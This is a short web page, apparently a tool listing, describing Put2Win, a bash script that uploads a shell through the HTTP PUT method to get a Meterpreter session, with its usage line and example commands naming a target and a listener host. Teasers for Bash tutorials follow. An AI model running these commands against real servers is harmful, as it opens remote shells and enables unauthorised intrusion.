Put2Win is a script to automatize shell upload by PUT HTTP method to get meterpreter. It’s necessary to have installed nmap and msfvenom tools for a correct operation.
Also ReadJoomscan – OWASP Joomla Vulnerability Scanner Project
./Put2win.sh -h
This script automatize shell upload by PUT HTTP method to get meterpreter.
Usage: ./Put2win.sh -t TARGET [-p PORT] -u URL_PATH -l LHOST
Examples:
./Put2win.sh -t 192.168.1.80 -u /uploads -l 192.168.1.10 ./Put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10
HikPwn: Comprehensive Guide to Scanning Hikvision Devices for Vulnerabilities If you’re searching for an efficient…
What Are Bash Comments? Comments in Bash scripts, are notes in your code that the…
When you write a Bash script in Linux, you want it to run correctly every…
Introduction If you’re new to Bash scripting, one of the first skills you’ll need is…
What is Bash Scripting? Bash scripting allows you to save multiple Linux commands in a file and…
When it comes to automating tasks on Linux, Bash scripting is an essential skill for both beginners…